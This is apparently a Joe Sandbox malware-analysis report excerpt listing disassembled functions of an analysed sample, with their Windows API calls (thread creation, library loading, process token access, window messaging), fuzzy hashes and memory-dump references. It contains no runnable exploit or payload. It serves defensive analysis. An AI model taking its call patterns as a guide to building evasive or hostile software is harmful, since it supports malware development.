Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 05e8a4b19b0fd2b01935ec666a195e08fc0ba56fe69d5a2992dbcb90624d120b
Instruction ID: c0d32b85b31f1538c14c623db52a72b55a13e79e2d3757ecb2f221507dfb8232
Opcode Fuzzy Hash: 05e8a4b19b0fd2b01935ec666a195e08fc0ba56fe69d5a2992dbcb90624d120b
Instruction Fuzzy Hash: 2B11AF31604655AFCB109F68CC04EB63BA5BF853A0F254728F839D72F0E7319990CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001B5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 001B56BB
_wcslen.LIBCMT ref: 001B56CD
_wcslen.LIBCMT ref: 001B56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 001B5816

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 4e680ce028c0ac3c011930d962173992ea45a0009651af753dbe1a3fc1b9b230
Instruction ID: c64567e4512687bff6758d110389206c47a534ad382ab3c5d6c90cef1647cbee
Opcode Fuzzy Hash: 4e680ce028c0ac3c011930d962173992ea45a0009651af753dbe1a3fc1b9b230
Instruction Fuzzy Hash: 9311E275A00608AADF20DF61CC85BFE77BCEF24768F50412AF915D6081EBB0CA80CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00151D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aff9d3118a2207c7f214f66ebd80045e34fa39ca75d3917f65b807cfe3b69e9
Instruction ID: e0263df13dd7003d8a704451da44e4f2e982dce683c51ca20a3d495b26a6a42b
Opcode Fuzzy Hash: 1aff9d3118a2207c7f214f66ebd80045e34fa39ca75d3917f65b807cfe3b69e9
Instruction Fuzzy Hash: 0C01A2B220561AFEF62226B86CC4F67676CDF913BAB310325FD31691D2DB708C484160

Uniqueness

Uniqueness Score: -1.00%

Function 00181A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00181A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00181A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00181A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00181A8A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 05e8c8ac0eac9cdae7de94f698de22482cc346bcc6f1b427ddeee933123a7774
Instruction ID: ab65c9477001dc1691b7153afceb2280631399d86d19356e27133b55d649f2ad
Opcode Fuzzy Hash: 05e8c8ac0eac9cdae7de94f698de22482cc346bcc6f1b427ddeee933123a7774
Instruction Fuzzy Hash: 8F11273A901219FFEB10ABA4C985FADBB79EB08750F200091EA10B7290D7716F51DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0018E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0018E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0018E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0018E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0018E24D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: b9c624eb6ad538f602732dc7a0d2cfb26cc3b7e3b4ba698dd8692df5e1c84db1
Instruction ID: 433f9707a40091f83f8be662dcf622dd0ec468816237bf99a8bf5f664ade2980
Opcode Fuzzy Hash: b9c624eb6ad538f602732dc7a0d2cfb26cc3b7e3b4ba698dd8692df5e1c84db1
Instruction Fuzzy Hash: 1411DB76904254FBC701AFA89C05AAF7FEEAB45320F544365F915E3691D7B0CE44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0014D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0014CFF9,00000000,00000004,00000000), ref: 0014D218
GetLastError.KERNEL32 ref: 0014D224
__dosmaperr.LIBCMT ref: 0014D22B
ResumeThread.KERNEL32(00000000), ref: 0014D249

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 082bd412f2cbb1c7101e167627bad19e26ef5f025cebe72f04b8f44bd91fc711
Instruction ID: 6b0902a7bfc21536b44561e60feeb87b9b517e8c9a90dad51d0e61856ecfe8d5
Opcode Fuzzy Hash: 082bd412f2cbb1c7101e167627bad19e26ef5f025cebe72f04b8f44bd91fc711
Instruction Fuzzy Hash: 7601D236805214BBCF115BA5EC09FAE7AA9EF91731F100329F925961F0CFB0C945C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 0012600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0012604C
GetStockObject.GDI32(00000011), ref: 00126060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0012606A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 44bc037ac586e3753c22b74e1c1d93ac2980af38f3ff03b4ee393f97cd719a6c
Instruction ID: f8d9bf2a2f9ccd93206d9670f110630496293d3ec502c6ba41825e90916da3d9
Opcode Fuzzy Hash: 44bc037ac586e3753c22b74e1c1d93ac2980af38f3ff03b4ee393f97cd719a6c
Instruction Fuzzy Hash: 7511AD72101518FFEF164FA4AC44EEABB6AFF193A4F000201FA0452150C736DCA0EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00143B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00143B56

Part of subcall function 00143AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00143AD2
Part of subcall function 00143AA3: ___AdjustPointer.LIBCMT ref: 00143AED

_UnwindNestedFrames.LIBCMT ref: 00143B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00143B7C
CallCatchBlock.LIBVCRUNTIME ref: 00143BA4

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 1b091a12bb0c4c552292e34e0e1de3de7d30ba2fa069f017a2980fbb3436e4a6
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 1E010832100149BBDF126E95CC46EEB7F6EEFA8754F044118FE58A6131C732E961EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00153073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001213C6,00000000,00000000,?,0015301A,001213C6,00000000,00000000,00000000,?,0015328B,00000006,FlsSetValue), ref: 001530A5
GetLastError.KERNEL32(?,0015301A,001213C6,00000000,00000000,00000000,?,0015328B,00000006,FlsSetValue,001C2290,FlsSetValue,00000000,00000364,?,00152E46), ref: 001530B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0015301A,001213C6,00000000,00000000,00000000,?,0015328B,00000006,FlsSetValue,001C2290,FlsSetValue,00000000), ref: 001530BF

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 0a650472d57af5fa19fc0f5ff907e6b6a6333c90443e768d1878a3456b387ae1
Instruction ID: 8517c3339c14b9020f796eea6ed2a84d08944552a6d732d11dc567866f55f209
Opcode Fuzzy Hash: 0a650472d57af5fa19fc0f5ff907e6b6a6333c90443e768d1878a3456b387ae1
Instruction Fuzzy Hash: 3101D432301322EBCB224A78DC849677B98AF45BE2B110720FD35EB180C721D949C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00187464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0018747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00187497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001874AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001874CA

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 59c4a894568008e06871136485151faaf0d62e8ba1e14dc05eacf529b26cdbc3
Instruction ID: 3f3b16a59ed26e548e87f0bf285a71a04dddc6b0bd7330606eaea1236cfff435
Opcode Fuzzy Hash: 59c4a894568008e06871136485151faaf0d62e8ba1e14dc05eacf529b26cdbc3
Instruction Fuzzy Hash: 8E11C0B1209310AFE720AF54DC08FA27FFCEB00B10F208569A656D6591D7B0EA44DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0018ACD3,?,00008000), ref: 0018B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0018ACD3,?,00008000), ref: 0018B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0018ACD3,?,00008000), ref: 0018B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0018ACD3,?,00008000), ref: 0018B126

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 8a2570d086b3ab92876c03728131da19f6ad8959ce7c2c3fa6f3b77530fbb30a
Instruction ID: 8bb6f72be4f0b7e2a95fafa689d6b6e62e243b15c6f839910cddb522037c4c7b
Opcode Fuzzy Hash: 8a2570d086b3ab92876c03728131da19f6ad8959ce7c2c3fa6f3b77530fbb30a
Instruction Fuzzy Hash: 47115B71C0562CEBCF04EFE8E9A86EEBB78FF09711F114186E981B6181CB3056908B91

Uniqueness

Uniqueness Score: -1.00%

Function 001B7E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001B7E33
ScreenToClient.USER32(?,?), ref: 001B7E4B
ScreenToClient.USER32(?,?), ref: 001B7E6F
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001B7E8A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 6d9b32acecd73ed50ef16e230455dcccf14f1ca59c116b486b7033e07f9e954a
Instruction ID: dc5524c6cdd686c62366883c84582f7a106db3199424e4509d29e0c74cdd5278
Opcode Fuzzy Hash: 6d9b32acecd73ed50ef16e230455dcccf14f1ca59c116b486b7033e07f9e954a
Instruction Fuzzy Hash: 161156B9D0024AAFDB41CF98C8849EEBBF5FF18310F505166E915E3610D735AA94CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00182DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00182DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00182DD6
GetCurrentThreadId.KERNEL32 ref: 00182DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00182DE4

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 5ed60016c57cb143e6af3eba3de145c433a5ad1f1b65bf5a540383ec67887fa2
Instruction ID: 3a99732c72af303ae8b505694add592365ef468a431e644d5df3b416e7d4e5a0
Opcode Fuzzy Hash: 5ed60016c57cb143e6af3eba3de145c433a5ad1f1b65bf5a540383ec67887fa2
Instruction Fuzzy Hash: F6E0ED72501224BBD7212BA69C0DEEB7F6CEB56BA1F400215F505D1591ABA58981CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 001B8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00139639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00139693
Part of subcall function 00139639: SelectObject.GDI32(?,00000000), ref: 001396A2
Part of subcall function 00139639: BeginPath.GDI32(?), ref: 001396B9
Part of subcall function 00139639: SelectObject.GDI32(?,00000000), ref: 001396E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001B8887
LineTo.GDI32(?,?,?), ref: 001B8894
EndPath.GDI32(?), ref: 001B88A4
StrokePath.GDI32(?), ref: 001B88B2

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 5e438dd9071b5371ea4e18862a587daa81accf7e3841d7a7ae9cb3991ba7541a
Instruction ID: 9ab927976a1019df3d5a3366833eb9eb603cb6896597b32560c2ffe21bd9df70
Opcode Fuzzy Hash: 5e438dd9071b5371ea4e18862a587daa81accf7e3841d7a7ae9cb3991ba7541a
Instruction Fuzzy Hash: 43F0823A041259FBDB126F94AC0EFDE3F59AF06710F048100FA11654E1C7B55591CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 001398B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 001398CC
SetTextColor.GDI32(?,?), ref: 001398D6
SetBkMode.GDI32(?,00000001), ref: 001398E9
GetStockObject.GDI32(00000005), ref: 001398F1

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 12b586624e4fd81091d16edd42973f2a4ca253dd294ed26c5f177d7b54c4744b
Instruction ID: 0acaad84c9534a4ad208fc934e194ec4b5c105c5463695a577cafbbe90c63e9a
Opcode Fuzzy Hash: 12b586624e4fd81091d16edd42973f2a4ca253dd294ed26c5f177d7b54c4744b
Instruction Fuzzy Hash: 2DE06D31244280EADB215B79AC09BE83F21AB52336F04C319F6FA684E1C37146809B20

Uniqueness

Uniqueness Score: -1.00%

Function 0018162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00181634
OpenThreadToken.ADVAPI32(00000000,?,?,?,001811D9), ref: 0018163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001811D9), ref: 00181648
OpenProcessToken.ADVAPI32(00000000,?,?,?,001811D9), ref: 0018164F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: a4e384fb962aa544a2d2c1a262295a29c5e4c5b2dcb544cfd1fc0a154f9c4014
Instruction ID: 3e29adb8fd7dde1912b172fb4f3666dd2fe5fa2a0cd6211dd413956a632d28f5
Opcode Fuzzy Hash: a4e384fb962aa544a2d2c1a262295a29c5e4c5b2dcb544cfd1fc0a154f9c4014
Instruction Fuzzy Hash: A9E08636601211EBD7202FA09D0DB873B7CAF54791F184918F285C9090E7744581CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0017D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0017D858
GetDC.USER32(00000000), ref: 0017D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0017D882
ReleaseDC.USER32(?), ref: 0017D8A3

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ef4506b7cc76b5e32ce10f6c0fd2d45c96226145282eb80031612656f95be27d
Instruction ID: a1328ea046efbd75fb15ab21eb0b422e7b3c115e5c80c634c47f535f18466947
Opcode Fuzzy Hash: ef4506b7cc76b5e32ce10f6c0fd2d45c96226145282eb80031612656f95be27d
Instruction Fuzzy Hash: 0CE01AB4C00204DFCB45AFA4E948A6DBBB1FB48310F118109F806E7750C7384991AF90

Uniqueness

Uniqueness Score: -1.00%

Function 0017D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0017D86C
GetDC.USER32(00000000), ref: 0017D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0017D882
ReleaseDC.USER32(?), ref: 0017D8A3

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 454cefad7a0b21e26fa37c1b5e18c3eeebbc1d7579dac0b6461329ae9a6b130a
